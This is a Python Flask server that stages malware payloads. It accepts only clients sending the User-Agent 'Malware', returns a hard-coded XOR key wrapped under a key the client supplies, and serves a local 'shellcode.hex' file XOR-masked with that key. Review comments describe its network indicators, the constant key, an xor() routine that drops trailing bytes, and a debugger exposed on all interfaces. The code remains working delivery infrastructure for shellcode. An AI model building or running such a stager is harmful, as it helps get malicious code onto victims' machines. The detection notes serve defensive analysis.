from flask import Flask, request, send_file, abort, Response
from Crypto.Cipher import PKCS1_OAEP
from Crypto.PublicKey import RSA
from wincrypto import CryptImportKey, CryptEncrypt, CryptGetKeyParam, CryptCreateHash, CryptHashData, CryptDeriveKey, CryptExportKey
from wincrypto.constants import CALG_SHA1, CALG_AES_256, bType_SIMPLEBLOB, bType_PUBLICKEYBLOB
# Flask application object; the hook and route below register against it.
app = Flask(__name__)
# Hex text for the six ASCII bytes b"secret". It is decoded with bytes.fromhex()
# in payload() and used both as the value wrapped for the client (POST) and as
# the XOR key applied to the served file (GET).
# NOTE(review): the key is a source-level constant shared by every client, so
# the GET response for a given shellcode.hex is byte-for-byte identical across
# requests and can be decoded by anyone holding this file.
secret = "736563726574"
def xor(data, key):
    """XOR *data* against *key* repeated a whole number of times.

    The key is repeated ``len(data) // len(key)`` times, so the keystream
    covers only the largest multiple of ``len(key)`` that fits in *data*.
    ``zip`` stops at the shorter input, which means any trailing bytes of
    *data* past that point are dropped from the result, and input shorter
    than the key yields ``b""``. An empty *key* raises ``ZeroDivisionError``.

    Applying the function twice with the same key returns the covered
    prefix of the original data.
    """
    repeats = len(data) // len(key)
    keystream = key * repeats
    mixed = bytearray()
    for data_byte, key_byte in zip(data, keystream):
        mixed.append(data_byte ^ key_byte)
    return bytes(mixed)
@app.before_request
def check_user_agent():
    """Reject every request whose User-Agent is not exactly 'Malware'.

    Registered as a before-request hook, so it runs ahead of the route
    handler. A missing header (``None``) or any other value ends the request
    with HTTP 403; a match falls through to normal routing.

    NOTE(review): the fixed User-Agent string is a usable indicator in proxy
    and web-server logs. Because clients with any other User-Agent only ever
    see 403, a 403 from this service does not show the endpoint is inert.
    """
    if request.headers.get('User-Agent') == 'Malware':
        return None
    abort(403)
@app.route('/payload/<int:id>', methods=['POST', 'GET'])
def payload(id):
    """Serve the two halves of the staging exchange for payload id 2.

    POST /payload/2
        The raw request body is passed to ``CryptImportKey`` as a key blob,
        the hard-coded ``secret`` bytes are encrypted under that key with
        ``CryptEncrypt``, and the ciphertext is returned as the response body.
    GET /payload/2
        ``shellcode.hex`` is read from the process working directory, XORed
        with the ``secret`` bytes via ``xor()``, and returned.
    Any other id or method
        Returns the plain string ``'No payload for id <id>'``.

    NOTE(review): the request body reaches ``CryptImportKey`` without any
    size or format check, and both the received blob and the outgoing
    ciphertext are printed to stdout. The key and the file are constant, so
    the GET response is deterministic; a hash of that body, the path
    ``/payload/2`` and the required User-Agent are the network-visible
    indicators of this exchange.
    """
    method = request.method
    if id != 2 or method not in ('POST', 'GET'):
        return 'No payload for id {}'.format(id)

    if method == 'POST':
        print("request received from : ", request.remote_addr)
        print("public key received : ", request.data)
        client_key_blob = request.data
        imported_key = CryptImportKey(client_key_blob)
        key_bytes = bytes.fromhex(secret)
        # The client receives the XOR key wrapped under the key it supplied.
        wrapped_key = CryptEncrypt(imported_key, key_bytes)
        print("len of enc :", len(wrapped_key))
        print("encrypted_xor_key : ", wrapped_key)
        return wrapped_key

    # Remaining case: GET for id 2.
    print("request received from : ", request.remote_addr, " on the GET method")
    with open('shellcode.hex', 'rb') as stage_file:
        stage = stage_file.read()
    key_bytes = bytes.fromhex(secret)
    masked_stage = xor(stage, key_bytes)
    print("encrypted : ", masked_stage)
    print("len encrypted : ", len(masked_stage))
    # Round-trip printed for operator debugging only; it is not sent.
    print("decrypted : ", xor(masked_stage, key_bytes))
    return masked_stage
# Script entry point: start Flask's built-in development server.
if __name__ == '__main__':
    # NOTE(review): debug mode turns on Flask's interactive debugger and
    # reloader. Together with the all-interfaces bind below, the debugger is
    # exposed to every host that can reach the port, not only to localhost.
    app.debug = True
    # Listens on every interface, TCP port 5001.
    app.run(host='0.0.0.0', port=5001)